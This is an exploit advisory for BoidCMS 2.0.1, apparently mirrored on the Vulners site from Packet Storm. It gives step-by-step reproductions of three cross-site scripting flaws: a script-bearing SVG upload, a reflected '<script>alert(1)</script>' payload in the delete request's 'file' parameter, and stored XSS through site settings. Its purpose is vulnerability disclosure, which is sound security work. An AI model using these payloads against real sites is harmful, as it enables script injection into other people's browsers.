Vulners
Lucene search
BoidCMS 2.0.1 Cross Site Scripting
🗓️ 04 Mar 2024 00:00:00Reported by Andrey StoykovType 
packetstorm🔗 packetstormsecurity.com👁 312 Views
`# Exploit Title: Multiple XSS Issues in boidcmsv2.0.1
# Date: 3/2024
# Exploit Author: Andrey Stoykov
# Version: 2.0.1
# Tested on: Ubuntu 22.04
# Blog: http://msecureltd.blogspot.com
XSS via SVG File Upload
Steps to Reproduce:
1. Login with admin user
2. Visit "Media" page
3. Upload xss.svg
4. Click "View" and XSS payload will execute
// xss.svg contents
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert(`XSS`);
</script>
</svg>
Reflected XSS:
Steps to Reproduce:
1. Login as admin
2. Visit "Media" page
3. Click "Delete" and intercept the HTTP GET request
4. In "file" parameter add the payload "<script>alert(1)</script>"
5. After forwarding the HTTP GET request a browser popup would surface
Stored XSS:
Steps to Reproduce:
1. Login as admin
2. Visit "Settings" page
3. Enter XSS payload in "Title", "Subtitle", "Footer"
4. Then visit the blog page
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Mar 2024 00:00Current
7.4High risk
Vulners AI Score7.4